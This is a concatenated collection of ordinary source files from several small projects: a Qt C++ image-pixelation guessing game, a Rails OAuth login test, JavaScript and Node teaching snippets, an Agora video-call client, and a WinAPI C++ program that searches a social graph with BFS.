    playerEdit->setFocus();
}

void PlayersPage::on_addPlayerButton_clicked()
{
    addPlayerRow();
}
<file_sep>#include "guess.h"
// One recorded guessing round: base points multiplied by the number of
// persons that guessed (the dialog multiplier).
// Uses the member-initializer list instead of assignment in the body.
Guess::Guess(int personsGuessed, int score, QString fileName)
    : personsGuessed(personsGuessed),
      score(score),
      fileName(fileName)
{
}

// Points earned for this round.
int Guess::getScore()
{
    return score * personsGuessed;
}
<file_sep>#include "game.h"
#include <QPixmap>
#include <QImageReader>
#include <QDialog>
#include <QPushButton>
#include "pixelator.h"
#include "player.h"
#include "guessdialog.h"
#include "ui_gamewizard.h"
// The game engine: owns the image list, the players and the slideshow timer.
Game::Game(const Configuration &configuration, QObject *parent) : QObject(parent), config(configuration)
{
    // In slideshow mode the timer drives the pixelation steps.
    connect(&timer, &QTimer::timeout, this, &Game::showNextPixelated);
}

// Loads fileNames[index] (honoring EXIF orientation via setAutoTransform)
// and scales it to the configured maximum size, keeping the aspect ratio.
QPixmap Game::getScaledImage(const int index) const
{
    QImageReader ir(fileNames[index]);
    ir.setAutoTransform(true);
    QPixmap image { QPixmap::fromImageReader(&ir) };
    return image.scaled(config.getImageWidth(), config.getImageHeight(), Qt::KeepAspectRatio, Qt::SmoothTransformation);
}

// Begins the game with the first image and locks the guess buttons.
void Game::start()
{
    currentImage = getScaledImage(0);
    showNextPixelated();
    emit uiChanged(false);
}
// Emits the next, less pixelated rendition of the current image.
// pixelCountDown indexes config.getSizes() from the back (coarsest block
// size) toward the front; when it underruns, the image is fully revealed.
// NOTE(review): the countdown start value (20) is hard-coded here and in
// revealImage — it must stay equal to getSizes().size() - 1; confirm when
// the sizes vector changes.
void Game::showNextPixelated()
{
    if (pixelCountDown >= 0) {
        QPixmap pixelated = gw::Pixelator::doPixelate(currentImage, config.getSizes()[pixelCountDown--]);
        emit imageChanged(pixelated);
    } else {
        pixelCountDown = 0;
        currentScore = 0;
        revealImage();
    }
}
// Automatic stepping: fires showNextPixelated every `duration` milliseconds.
void Game::startSlideshow()
{
    timer.start(config.getDuration());
}

void Game::stopSlideshow()
{
    timer.stop();
}

// Shows the unpixelated image, unlocks guessing, fixes this round's score
// (the more steps left unused, the higher) and pre-loads the next image.
void Game::revealImage()
{
    emit imageChanged(currentImage);
    emit uiChanged(true);
    currentScore = pixelCountDown + 2;  // remaining steps + 2 points
    pixelCountDown = 20;                // reset countdown for the next round
    loadNextImage();
}
// Runs the modal setup wizard; on acceptance, stores the chosen image
// files, creates one Player per entered name and signals completion.
void Game::showWizard()
{
    QWizard gameWizard;
    wizardUi = new Ui::GameWizard;
    wizardUi->setupUi(&gameWizard);
    wizardUi->imagesPage->setTitle("Images");
    wizardUi->playersPage->setTitle("Players");
    if (gameWizard.exec()) {
        // Wizard fields registered by the pages: "imageFiles" and "player<N>".
        fileNames = gameWizard.field("imageFiles").value<QStringList>();
        for (int i = 0; i < wizardUi->playersPage->getPlayerCount(); ++i) {
            players += new Player(gameWizard.field(QString("player") + QString::number(i)).toString());
        }
        emit wizardCompleted();
    }
    delete wizardUi;
}
// Asks for the guess multiplier and, if confirmed, credits the current
// round's score to the given player and locks further guessing.
void Game::showGuessDialog(int player)
{
    GuessDialog dialog(currentScore);
    if (dialog.exec()) {
        players[player]->addGuess(dialog.getMulti(), currentScore, "");
        emit guessCompleted(player);
        emit uiChanged(false);
        currentScore = 0;  // a round can only be claimed once
    }
}

QList<Player *> Game::getPlayers() const
{
    return players;
}
// Advances to the next image, wrapping back to the first after the last.
// The scaled result is cached in currentImage for the pixelation steps.
void Game::loadNextImage()
{
    // BUG FIX: with an empty file list the original recursed forever
    // (index reset to -1, then loadNextImage() again). Guard and bail out.
    if (fileNames.isEmpty()) {
        return;
    }
    // Modulo wrap replaces the reset-and-recurse of the original.
    currentImageIndex = (currentImageIndex + 1) % fileNames.size();
    currentImage = getScaledImage(currentImageIndex);
}
<file_sep>#include "configuration.h"
#include "settingsdialog.h"
#include <QSharedData>
// Shared payload behind Configuration's QSharedDataPointer (copy-on-write).
class ConfigurationData : public QSharedData
{
public:
    ConfigurationData() {}
    ConfigurationData(const ConfigurationData &other) : QSharedData(other) {}
    ~ConfigurationData() {}

    int imageHeight = 0;
    int imageWidth = 0;
    int duration = 0;
    // Pixel block sizes; Game::showNextPixelated consumes them back-to-front,
    // so the first step uses 128 (the coarsest).
    QVector<int> sizes = { 2, 4, 5, 6, 7, 8, 10, 12, 14, 17, 21, 25, 30, 36, 43, 51, 62, 74, 89, 107, 128 };
    //QVector<int> sizes = { 128, 107, 89, 74, 62, 51, 43, 36, 30, 25, 21, 17, 14, 12, 10, 8, 7, 6, 5, 4, 2 };
};
Configuration::Configuration()
{
    d = new ConfigurationData;
}

// Copies share the same payload until one side writes (implicit sharing).
Configuration::Configuration(const Configuration &other) : d(other.d)
{
}

Configuration &Configuration::operator=(const Configuration &other)
{
    if (this == &other) return *this;
    d = other.d;
    return *this;
}

Configuration::~Configuration()
{
}
// Loads image limits and slideshow duration from the "Images" group.
// NOTE(review): `sizes` is not persisted — it always keeps its default.
void Configuration::readSettings(QSettings &settings)
{
    settings.beginGroup("Images");
    d->imageWidth = settings.value("imageWidth", 1920).toInt();
    d->imageHeight = settings.value("imageHeight", 1080).toInt();
    d->duration = settings.value("duration", 1000).toInt();
    settings.endGroup();
}

// Persists the same three values under the "Images" group.
void Configuration::writeSettings(QSettings &settings)
{
    settings.beginGroup("Images");
    settings.setValue("imageWidth", d->imageWidth);
    settings.setValue("imageHeight", d->imageHeight);
    settings.setValue("duration", d->duration);
    settings.endGroup();
}
// Plain accessors; each setter detaches the shared payload (copy-on-write)
// before writing.
int Configuration::getImageHeight() const
{
    return d->imageHeight;
}

void Configuration::setImageHeight(int value)
{
    d->imageHeight = value;
}

int Configuration::getImageWidth() const
{
    return d->imageWidth;
}

void Configuration::setImageWidth(int value)
{
    d->imageWidth = value;
}

// Slideshow interval in milliseconds.
int Configuration::getDuration() const
{
    return d->duration;
}

void Configuration::setDuration(int value)
{
    d->duration = value;
}

// Pixelation block sizes (ascending; consumed back-to-front by Game).
QVector<int> Configuration::getSizes() const
{
    return d->sizes;
}

void Configuration::setSizes(const QVector<int> &value)
{
    d->sizes = value;
}
// Opens the modal settings dialog and, if accepted, applies the edited
// values. NOTE(review): the dialog displays the pixel sizes but they are
// never read back here.
void Configuration::showDialog()
{
    SettingsDialog settingsDialog(*this);
    if (settingsDialog.exec()) {
        setDuration(settingsDialog.getDuration());
        setImageHeight(settingsDialog.getMaxHeight());
        setImageWidth(settingsDialog.getMaxWidth());
    }
}
<file_sep>#ifndef PLAYERSPAGE_H
#define PLAYERSPAGE_H
#include <QWizardPage>
namespace Ui {
class PlayersPage;
}
// Wizard page collecting up to MAX_PLAYERS player names; each name line
// edit is registered as wizard field "player<N>".
class PlayersPage : public QWizardPage
{
    Q_OBJECT

public:
    explicit PlayersPage(QWidget *parent = 0);
    ~PlayersPage();

    // Number of name rows added so far.
    int getPlayerCount() const;

private:
    Ui::PlayersPage *ui;
    int playerCount = 0;
    const int MAX_PLAYERS = 4;

    // Adds one name row and registers its wizard field.
    void addPlayerRow();

private slots:
    void on_addPlayerButton_clicked();
};
#endif // PLAYERSPAGE_H
<file_sep>#include "playerinfo.h"
#include "ui_playerinfo.h"
#include "player.h"
// Small widget showing one player's name and running score.
PlayerInfo::PlayerInfo(Player *player, QWidget *parent) :
    QWidget(parent),
    ui(new Ui::PlayerInfo)
{
    ui->setupUi(this);
    this->player = player;  // not owned; must outlive this widget
}

PlayerInfo::~PlayerInfo()
{
    delete ui;
}
// Rebinds this panel to another player and refreshes the displayed values.
void PlayerInfo::setPlayer(Player *player)
{
    // BUG FIX: the original never stored the new player, so the panel kept
    // showing the player passed to the constructor.
    this->player = player;
    update();
}
// Refreshes the name and score labels from the bound player.
// NOTE(review): this non-virtual overload shadows QWidget::update(); calls
// through a PlayerInfo* reach this method, calls through a QWidget* repaint.
// Dereferences `player` unchecked — presumably callers always bind a valid
// player; confirm.
void PlayerInfo::update()
{
    ui->nameLabel->setText(player->getName());
    ui->scoreLabel->setText(QString::number(player->getScore()));
}
| eb0c4d51d5080e3e32559c369fc244ab917e8329 | [
"C++"
] | 20 | C++ | freepenguin84/GuessWhoGame | aa21244a63ab41b97df15840826f84f5c17ce927 | 1818a4e80fff5e4373bc5d86c4be6a2af8eec9dc |
refs/heads/master | <file_sep>require "test_helper"
# Controller specs for the OAuth login flow (OmniAuth callback).
describe UsersController do
  describe "auth_callback" do
    # Returning user: perform_login (test helper) logs in via a mocked OAuth
    # hash for an existing user, so no new record should be created.
    it "logs in the first existing user and redirects them to the root path" do
      expect{
        perform_login
      }.wont_change "User.count"

      must_redirect_to root_path
      # The session carries the logged-in user's id and the flash confirms it.
      expect(session[:user_id]).must_equal User.first.id
      assert_equal "Logged in as returning user #{User.first.username}", flash[:result_text]
    end

    # New user: a complete, valid OAuth payload creates exactly one record.
    it "logs in a new user and redirects them back to the root path" do
      user = User.new(
        username: "jane",
        provider: "github",
        uid: 666,
        email: "<EMAIL>",
      )

      expect {
        perform_login(user)
      }.must_change "User.count", 1

      # Re-fetch by uid to get the persisted record (with its database id).
      user = User.find_by(uid: user.uid)
      must_redirect_to root_path
      expect(session[:user_id]).must_equal user.id
      assert_equal "Logged in as new user #{user.username}", flash[:result_text]
    end

    # Invalid callback (blank User): nothing is saved and no session is set.
    it "should redirect back to the root path for invalid callbacks" do
      expect{
        perform_login(User.new)
      }.wont_change "User.count"

      must_redirect_to root_path
      expect(session[:user_id]).must_be_nil
      assert_equal "Could not create new user account:", flash[:result_text]
    end
  end
end
| d1c216f6b876f27fe48d1efe38ff5ac7c10a7f0b | [
"Ruby"
] | 1 | Ruby | minipaige02/media-ranker-revisited | 088363505366976b27ea0427433e295b0f0066d6 | 08b6021d59c68a3f59eca8cfa1aacc4d1627a006 |
refs/heads/main | <file_sep>function sejaBemVindo(){
console.log("Seja Bem Vindo ao Curso de Javascript");
}
console.log("chamando a função seja bem vindo sejaBemVindo():");
sejaBemVindo();
//POO
var objProfessor ={
nome: "Prof. <NAME>",
curso: "Formação JavaScript",
mistrarAula: function(){
console.log("Ministrando aula de JavaScript");
}
};
console.log("objeto Professor");
console.log(objProfessor);
console.log("acessando propriedades do objeto");
console.log(objProfessor.nome);
console.log(objProfessor.curso);
objProfessor.nome;
objProfessor.curso;
console.log("chamando o método do objeto professor: objProfessor.ministrarAula()");
objProfessor.mistrarAula();
<file_sep>var curso= " Fromação JavaScript";
console.log(" Ol<NAME>ja Bem o Vindo ao Curso" + curso);
// Synchronous-execution demo: the loop runs to completion before the
// final log statement executes.
for (let index = 0; index < 10; index++) {
  console.log(index);
}
console.log("Esse Curso é 10!!");
# Execução de código JS com evento onload
```js
//declaração de váriaveis
var nome = "<NAME>";
var sobreNome= "Jordan";
console.log("Instrução solta em um arquivo JS");
//declaração de função
function exibirNomeConsole(){
console.log("exibir nome" + nome);
}
function exibirNomeCompleto(){
console.log("Professor, nome completo" + nome + "" + sobreNome);
}
//chamadas de função
exibirNomeConsole();
```
# Entendendo a Execução de código JS
```js
//declaração de váriaveis
var nome = "<NAME>";
var sobreNome= "Jordan";
console.log("Instrução solta em um arquivo JS");
//declaração de função
function exibirNomeConsole(){
console.log("exibir nome" + nome);
}
exibirNomeConsole();
```
# Execução de código JS com evento onclick
```js
//declaração de váriaveis
var nome = "<NAME>";
var sobreNome= "Jordan";
console.log("Instrução solta em um arquivo JS");
//declaração de função
function exibirNomeConsole(){
console.log("exibir nome" + nome);
}
function exibirNomeCompleto(){
console.log("Professor, nome completo" + nome + "" + sobreNome);
}
function eventoClick(){
alert("Você clicou em um botão")
}
//chamadas de função
exibirNomeConsole();
```
# Exemplo Programação Sincrona
```js
var curso= " Fromação JavaScript";
console.log(" Olá Seja Bem o Vindo ao Curso" + curso);
for (let index =0; index < 10; index++) {
console.log(index);
}
console.log("Esse Curso é 10!!");
```
# Formas de carregamento javascript em páginas
```js
console.log("Carregando Js via arquivo Exeterno mesmo domínio");
```
# Programação funcional em JavaScript
```js
function sejaBemVindo(){
console.log("Seja Bem Vindo ao Curso de Javascript");
}
console.log("chamando a função seja bem vindo sejaBemVindo():");
sejaBemVindo();
//POO
var objProfessor ={
nome: "Prof. <NAME>",
curso: "Formação JavaScript",
mistrarAula: function(){
console.log("Ministrando aula de JavaScript");
}
};
console.log("objeto Professor");
console.log(objProfessor);
console.log("acessando propriedades do objeto");
console.log(objProfessor.nome);
console.log(objProfessor.curso);
objProfessor.nome;
objProfessor.curso;
console.log("chamando o método do objeto professor: objProfessor.ministrarAula()");
objProfessor.mistrarAula();
Footer
© 2022 GitHub, Inc.
Footer navigation
Terms
Privacy
```
| dbb00019147dd2a53b718b8969903329eedae281 | [
"JavaScript",
"Markdown"
] | 3 | JavaScript | bitcoinander/Aulas-JavaScript | e473522e5860c6b34c774ad56898893815c0bc8e | 6f57f321271a65858d67f8ba8bd2c2d25874dd13 |
refs/heads/main | <repo_name>BogdanTabor/hello-node-js<file_sep>/index.js
// //OPEN SERVER WITH 'HTTP' MODULE
// const http = require('http');
// const host = 'localhost';
// const port = 8000;
// const requireListener = function (req, res) {
// res.writeHead(200);
// res.end("Hello node");
// };
// const server = http.createServer(requireListener)
// server.listen(port, host, () => {
// console.log(`Server is running on http://${host}:${port}`)
// });
//CODE FOR AWS LAMBDA
exports.handler = async (event) => {
const response = {
statusCode: 200,
body: JSON.stringify('Hello AWS!'),
};
return response;
};
// //GENERATE HTML FROM SERVER
// var http = require('http');
// http.createServer(function(request, respone){
// respone.writeHead(200, {'Content-type':'text/plan'});
// response.end("Hello node");
// }).listen(8000); | a2471f476efeb7877179b8eb820f931c69807097 | [
"JavaScript"
] | 1 | JavaScript | BogdanTabor/hello-node-js | e1b9a986b5c6d68351a2d324349152a504a1406b | c7b1e959db7012d73d765a477e6a2a86ff51c074 |
refs/heads/main | <file_sep>// Helper fn. to handle error
// Shared failure callback for the Agora SDK: logs the error and returns nothing.
let handleFail = (err) => {
  console.log("Error : ", err);
};
// Queries the container in which the remote feeds belong
let remoteContainer= document.getElementById("remote-container");
// Helper fn. to add the video stream to remote-container
function addVideoStream(streamId){
let streamDiv=document.createElement("div"); // Create a new div for every stream
streamDiv.id=streamId; // Assigning id to div
streamDiv.style.transform="rotateY(180deg)"; // Takes care of mirror image
remoteContainer.appendChild(streamDiv); // Add new div to container
}
// Helper fn. to remove the video stream from remote-container
function removeVideoStream (evt) {
let stream = evt.stream;
stream.stop();
let remDiv=document.getElementById(stream.getId());
remDiv.parentNode.removeChild(remDiv);
console.log("Remote stream is removed " + stream.getId());
}
// Creating an Agora Client Object
let client = AgoraRTC.createClient({
  mode: "rtc", // mode: "live" | "rtc"
  codec: "vp8" //codec: "vp8" | "vp9" | "h264"
  /* "vp8": Sets the browser to use VP8 for encoding.
     "h264": Sets the browser to use H.264 for encoding.
     "vp9": This parameter is reserved for future use. */
});

// Initialize the client with the app id from the external `config` object.
client.init(config.app_id,() => console.log("AgoraRTC client initialized") ,handleFail);

// Join the hard-coded channel; on success, capture and publish the local
// webcam/microphone stream.
client.join(null,"any-channel",null, (uid)=>{
  // Stream object associated with your web cam is initialized
  let localStream = AgoraRTC.createStream({
    audio: true,
    video: true,
  });
  // Associates the stream to the client
  localStream.init(function() {
    // Plays the local video into the element with id 'me'
    localStream.play('me');
    // Publishes the stream to the channel
    client.publish(localStream, handleFail);
  },handleFail);
},handleFail);

// When a remote stream is added to the channel, subscribe to it.
client.on('stream-added', function (evt) {
  client.subscribe(evt.stream, handleFail);
});

// Once subscribed, create a container div and play the remote stream in it.
client.on('stream-subscribed', function (evt) {
  let stream = evt.stream;
  addVideoStream(String(stream.getId()));
  stream.play(String(stream.getId()));
});

// Clean up the DOM when a remote stream goes away.
client.on('stream-removed',removeVideoStream);
client.on('peer-leave',removeVideoStream);<file_sep>"# Agora-Video-call-demo"
| 03b2d8902a6800671f3cf1a00482ff43d12f9621 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | nilisha-jais/Agora-Video-Calling-App | 45695748296c9907e733a8969ff4da36eb8fbd82 | d70efaabe85ebb49785d79e63f34544549bc7de7 |
refs/heads/master | <file_sep>#ifndef QUEUE_HH_INCLUDED
#define QUEUE_HH_INCLUDED
#include <iostream>
/*!
*\file queue.hh
*\brief zawiera definicje klas queue_node, queue
*queue_node - wezel kolejki
*queue - kolejka
*/
/*!
 *\brief queue_node class
 * A single link of the queue's internal singly linked list.
 */
class queue_node {
public:
    queue_node *next; /*!< pointer to the next node (NULL at the back) */
    int data; /*!< stored value */
};
/*!
 *\brief queue class
 * FIFO queue implemented on a singly linked list of queue_node.
 */
class queue {
public:
    queue_node *first; /*!< pointer to the first (oldest) element */
    queue_node *last; /*!< pointer to the last (newest) element */
public:
    bool is_empty()const; /*!< true when the queue holds no elements */
    /*!
     *\brief Appends an element at the back of the queue.
     *\param element value to enqueue
     */
    void push(int element);
    /*!
     *\brief Removes the element at the front of the queue (no-op when empty).
     */
    void pop();
    /*!
     *\brief Destructor: frees all remaining nodes.
     */
    ~queue();
    /*!
     *\brief Default constructor: initialises both pointers to NULL.
     */
    queue() : first(NULL), last(NULL) {}
    /*!
     *\brief Prints the queue contents to stdout.
     */
    void print()const;
    int front(void); /*!< front element, or a sentinel when empty */
};
#endif // QUEUE_HH_INCLUDED
<file_sep>#ifndef STACK_HH_INCLUDED
#define STACK_HH_INCLUDED
#include <iostream>
/*!
*\file
*\brief definicja struktury danych Lista
*/
/*!
 *\brief Lista class
 * Singly linked list used as a stack (LIFO): push/pop operate on the head.
 * Built on a template; the head object itself acts as a sentinel whose
 * `nastepny` points at the first real element.
 */
template<typename typ>
class Lista {
public:
    Lista<typ>* nastepny; /*!< pointer to the next node */
    typ dane; /*!< stored element (unused in the sentinel head) */
    int rozmiar; /*!< number of elements (maintained on the head only) */
public:
    Lista();
    ~Lista();
    void push(typ element);
    typ pop();
    int size()const;
    void wyswietl();
};
/*!
 *\brief Default constructor.
 * Zeroes the element count and sets the next pointer to NULL.
 */
template<typename typ>
Lista<typ>::Lista()
{
    nastepny=NULL;
    rozmiar=0;
}
/*!
 *\brief Pushes an element onto the front of the list (stack order).
 *\param element element to store
 * Increments the count, allocates a node and links it in as the new head.
 */
template<typename typ>
void Lista<typ>::push(typ element)
{
    rozmiar++;
    Lista<typ> *tmp=new Lista<typ>;
    tmp->dane=element;
    tmp->nastepny=nastepny;
    nastepny=tmp;
}
/*!
 *\brief Removes and returns the most recently pushed element.
 *\return the removed element; prints a message and returns 0 when empty.
 * Bug fix: the original placed `delete tmp;` AFTER the `return` statement,
 * so the node was never freed (memory leak). The node is now detached
 * before deletion, because ~Lista() on a still-linked node would otherwise
 * destroy the remainder of the list.
 */
template<typename typ>
typ Lista<typ>::pop()
{
    if(nastepny==NULL)
    {
        std::cout << "Lista jest pusta." << std::endl;
        return 0;
    } else {
        rozmiar--;
        Lista<typ> *tmp=nastepny;
        nastepny=tmp->nastepny;
        typ wynik = tmp->dane;   // copy the payload out before freeing the node
        tmp->nastepny = NULL;    // detach so the node's destructor frees only itself
        delete tmp;
        return wynik;
    }
}
/*!
 *\brief Returns the number of elements currently stored in the list.
 */
template<typename typ>
int Lista<typ>::size()const
{
    return rozmiar;
}
/*!
 *\brief Destructor.
 * Pops (and frees) every remaining element, then zeroes the count.
 */
template<typename typ>
Lista<typ>::~Lista()
{
    while(nastepny!=NULL)
        pop();
    rozmiar=0;
}
// Prints every stored element to stdout, one per line, head first.
template<typename typ>
void Lista<typ>::wyswietl()
{
    Lista<typ> *tmp=nastepny;
    while(tmp)
    {
        std::cout << tmp->dane << std::endl;
        tmp=tmp->nastepny;
    }
}
#endif // STACK_HH_INCLUDED
<file_sep>#include <iostream>
#include <string>
#include <fstream>
#include <sstream>
#include "graph.hh"
#include "queue.hh"
#include "stack.hh"
#include "format.h"
#include "global.h"
using namespace std;
/*!
*\mainpage program - poznanie osoby x
*\author <NAME>, W.Maluszynski
*\date
*\version 0.1
*
*Program zrealizowany jest z wykorzystaniem funkcji winApi
*W pierwszym polu nalezy wpisac plik zawieracjacy konfiguracje grafu, nastepnie wczytac
*W drugim polu nalezy wpisac identyfikator pierwszej osoby, nastepnie wczytac
*W trzecim polu nalezy wpisac identyfikator drugiej osoby, nastepnie wczytac
*program wyswietla okineko ze znaleziona sciezka
*W przypadku blednej nazwy pliku lub nieznalezienia sciezki
*program zglasza blad
*/
// Application entry point: registers the window class, creates the main
// window plus three rows of controls (static label / edit box / button:
// graph file, first user id, second user id) and runs the message loop.
int WINAPI WinMain( HINSTANCE hThisInstance,
                    HINSTANCE hPrevInstance,
                    LPSTR lpszArgument,
                    int nCmdShow )
{
    //HWND hwnd; /* This is the handle for our window */
    MSG messages; /* Here messages to the application are saved */
    WNDCLASSEX wincl; /* Data structure for the windowclass */
    /* The Window structure */
    wincl.hInstance = hThisInstance;
    wincl.lpszClassName = szClassName;
    wincl.lpfnWndProc = WindowProcedure; /* This function is called by windows */
    wincl.style = CS_DBLCLKS; /* Catch double-clicks */
    wincl.cbSize = sizeof( WNDCLASSEX );
    /* Use default icon and mouse-pointer */
    wincl.hIcon = LoadIcon( NULL, IDI_APPLICATION );
    wincl.hIconSm = LoadIcon( NULL, IDI_APPLICATION );
    wincl.hCursor = LoadCursor( NULL, IDC_ARROW );
    wincl.lpszMenuName = NULL; /* No menu */
    wincl.cbClsExtra = 0; /* No extra bytes after the window class */
    wincl.cbWndExtra = 0; /* structure or the window instance */
    /* Use Windows's default colour as the background of the window */
    wincl.hbrBackground =( HBRUSH ) COLOR_BACKGROUND;
    /* Register the window class, and if it fails quit the program */
    if( !RegisterClassEx( & wincl ) )
        return 0;
    /* The class is registered, let's create the program*/
    hwnd = CreateWindowEx(
        0, /* Extended possibilites for variation */
        szClassName, /* Classname */
        _T( "Poznaznie osoby x" ), /* Title Text */
        WS_OVERLAPPEDWINDOW, /* default window */
        CW_USEDEFAULT, /* Windows decides the position */
        CW_USEDEFAULT, /* where the window ends up on the screen */
        800, /* The programs width */
        400, /* and height in pixels */
        HWND_DESKTOP, /* The window is a child-window to desktop */
        NULL, /* No menu */
        hThisInstance, /* Program Instance handler */
        NULL /* No Window Creation data */
    );
    /* Row 1: graph-file name (label, edit box, "Set Graph" button). */
    hStaticDebugBox = CreateWindowEx( 0, "STATIC", NULL, WS_CHILD | WS_VISIBLE | SS_LEFT,
        10, 10, 763, 20, hwnd,( HMENU ) ID_STATICTEXTBOX1, hThisInstance, NULL );
    hCommandLine = CreateWindowEx( WS_EX_CLIENTEDGE, "EDIT", NULL, WS_CHILD | WS_VISIBLE | WS_BORDER,
        10, 40, 763, 20, hwnd,( HMENU ) ID_COMANDLINE, hThisInstance, NULL );
    hExecButton = CreateWindowEx( 0, "BUTTON", "Set Graph", WS_CHILD | WS_VISIBLE,
        660, 70, 100, 30, hwnd,( HMENU ) ID_BUTTON1, hThisInstance, NULL );
    /* Row 2: first person's id. */
    hStaticDebugBox2 = CreateWindowEx( 0, "STATIC", NULL, WS_CHILD | WS_VISIBLE | SS_LEFT,
        10, 100, 763, 20, hwnd,( HMENU ) ID_STATICTEXTBOX2, hThisInstance, NULL );
    hCommandLine2 = CreateWindowEx( WS_EX_CLIENTEDGE, "EDIT", NULL, WS_CHILD | WS_VISIBLE | WS_BORDER,
        10, 140, 763, 20, hwnd,( HMENU ) ID_COMANDLINE, hThisInstance, NULL );
    hExecButton2 = CreateWindowEx( 0, "BUTTON", "User 1", WS_CHILD | WS_VISIBLE,
        660, 170, 100, 30, hwnd,( HMENU ) ID_BUTTON2, hThisInstance, NULL );
    /* Row 3: second person's id. */
    hStaticDebugBox3 = CreateWindowEx( 0, "STATIC", NULL, WS_CHILD | WS_VISIBLE | SS_LEFT,
        10, 200, 763, 20, hwnd,( HMENU ) ID_STATICTEXTBOX3, hThisInstance, NULL );
    hCommandLine3 = CreateWindowEx( WS_EX_CLIENTEDGE, "EDIT", NULL, WS_CHILD | WS_VISIBLE | WS_BORDER,
        10, 240, 763, 20, hwnd,( HMENU ) ID_COMANDLINE, hThisInstance, NULL );
    hExecButton3 = CreateWindowEx( 0, "BUTTON", "User 2", WS_CHILD | WS_VISIBLE,
        660, 270, 100, 30, hwnd,( HMENU ) ID_BUTTON3, hThisInstance, NULL );
    /* Make the window visible on the screen */
    ShowWindow( hwnd, nCmdShow );
    /* Run the message loop. It will run until GetMessage() returns 0 */
    while( GetMessage( & messages, NULL, 0, 0 ) )
    {
        /* Translate virtual-key messages into character messages */
        TranslateMessage( & messages );
        /* Send message to WindowProcedure */
        DispatchMessage( & messages );
    }
    /* The program return-value is 0 - The value that PostQuitMessage() gave */
    return messages.wParam;
}
/* This function is called by the Windows function DispatchMessage() */
LRESULT CALLBACK WindowProcedure( HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam )
{
    switch( message ) /* handle the messages */
    {
        case WM_DESTROY:
            PostQuitMessage( 0 ); /* send a WM_QUIT to the message queue */
            break;
        case WM_COMMAND:
            /* Button 1: read the graph file name from the first edit box and
             * build the adjacency matrix from its edge list. */
            if( wParam == ID_BUTTON1 )
            {
                int bufor = 0;
                CommandLineBuf =( LPSTR )GlobalAlloc( GPTR, GetWindowTextLength( hCommandLine ) + 1 );
                bufor = GetWindowText( hCommandLine, CommandLineBuf, 50 );
                // cout << bufor << endl;
                SetDlgItemText( hwnd, ID_STATICTEXTBOX1, CommandLineBuf );
                plik.open(CommandLineBuf,ios::in);
                if(!plik.good())
                {
                    cout << "blad otwarcia pliku." << endl;
                    MessageBox(hwnd,"blad otwarcia pliku.","Blad",MB_ICONINFORMATION);
                    // NOTE(review): returning here leaks CommandLineBuf
                    // (GlobalFree is skipped) — confirm whether intentional.
                    return -1;
                }
                int i,j;
                int licznik=0;
                /* First pass: count edges; after the loop, j holds the last
                 * (assumed largest) vertex id read from the file. */
                while(!plik.eof())
                {
                    plik >> i;
                    plik >> j;
                    licznik++;
                }
                G=new CGraph(j+1,j+1);
                plik.close();
                /* Second pass: insert every edge into the graph. */
                plik.open(CommandLineBuf,ios::in);
                for(int k=0;k<licznik;k++)
                {
                    plik >> i;
                    plik >> j;
                    G->set_graph(i,j);
                }
                GlobalFree( CommandLineBuf );
            }
            /* Button 2: parse the first (start) person's id. */
            if( wParam == ID_BUTTON2 )
            {
                int bufor = 0;
                CommandLineBuf =( LPSTR )GlobalAlloc( GPTR, GetWindowTextLength( hCommandLine2 ) + 1 );
                bufor = GetWindowText( hCommandLine2, CommandLineBuf, 50 );
                SetDlgItemText( hwnd, ID_STATICTEXTBOX2, CommandLineBuf );
                start_path = strtod(CommandLineBuf, NULL );
                GlobalFree( CommandLineBuf );
            }
            /* Button 3: parse the target person's id, run BFS and show the
             * resulting path in a message box. */
            if( wParam == ID_BUTTON3 )
            {
                int bufor = 0;
                CommandLineBuf =( LPSTR )GlobalAlloc( GPTR, GetWindowTextLength( hCommandLine3 ) + 1 );
                bufor = GetWindowText( hCommandLine3, CommandLineBuf, 50 );
                SetDlgItemText( hwnd, ID_STATICTEXTBOX3, CommandLineBuf );
                end_path=strtod(CommandLineBuf,NULL);
                if(!G->BFSPath(start_path,end_path,&C))
                {
                    MessageBox(hwnd,"Sciezka do poznania osoby nie zostala odnaleziona.","Blad",MB_ICONINFORMATION);
                    /* NOTE(review): explicit destructor call on the live
                     * global C; relies on ~Lista leaving the object reusable
                     * (it resets its pointers) — confirm intended. */
                    C.~Lista<int>();
                    break;
                }
                tmp_string=ZamienFormat(&C);
                MessageBox(hwnd,tmp_string,"Najszybsza sciezka do poznania osoby.",MB_ICONINFORMATION);
                C.~Lista<int>();
                GlobalFree( CommandLineBuf );
            }
        default: /* for messages that we don't deal with */
            return DefWindowProc( hwnd, message, wParam, lParam );
    }
    return 0;
}
/*
int main()
{
fstream plik;
plik.open("facebook_combined.txt",ios::in);
if(!plik.good())
{
cout << "blad otwarcia pliku." << endl;
return -1;
}
int i,j;
int licznik=0;
while(!plik.eof())
{
plik >> i;
plik >> j;
licznik++;
}
CGraph *G=new CGraph(j+1,j+1);
plik.close();
plik.open("facebook_combined.txt",ios::in);
for(int k=0;k<licznik;k++)
{
plik >> i;
plik >> j;
G->set_graph(i,j);
}
G->BFSPath(0,4038);
plik.close();
return 0;
}
*/
<file_sep>#ifndef GRAPH_HH_INCLUDED
#define GRAPH_HH_INCLUDED
#include <fstream>
#include "stack.hh"
/*!
*\file graph.hh
*\brief zwiera definicje klas CNode, CEdge, CGrpah
*CNode - wezel grafu
*CEdge - krawedz grafu
*CGraph - graf
*/
/*!
 *\brief CNode class
 * A single vertex of the graph.
 */
class CNode {
    friend class CEdge;
    friend class CGraph;
    int value; /*!< value stored in the vertex */
};
/*!
 *\brief CEdge class
 * An unweighted graph edge joining two vertices.
 */
class CEdge {
    friend class CGraph;
    CNode *prev; /*!< first endpoint */
    CNode *next; /*!< second endpoint */
};
/*!
 *\brief CGraph class
 * Undirected, unweighted graph stored as a V x V adjacency matrix.
 */
class CGraph {
public:
    int V; /*!< number of vertices */
    int E; /*!< edge capacity given at construction */
    int **matrix; /*!< V x V adjacency matrix (0/1 entries) */
    bool* visited; /*!< per-vertex "already visited" flags used by traversals */
public:
    /*!
     *\brief Constructor: allocates the adjacency matrix and visited array.
     *\param v number of vertices
     *\param e number of edges
     */
    CGraph(int v, int e);
    /*!
     *\brief Destructor: frees the matrix rows and the visited array.
     */
    ~CGraph();
    /*!
     *\brief Marks the two vertices as adjacent in both directions.
     *\param vertice1 first endpoint
     *\param vertice2 second endpoint
     */
    void set_graph(int vertice1, int vertice2);
    /*!
     *\brief Prints the adjacency matrix to stdout.
     */
    void print_matrix()const;
    /*!
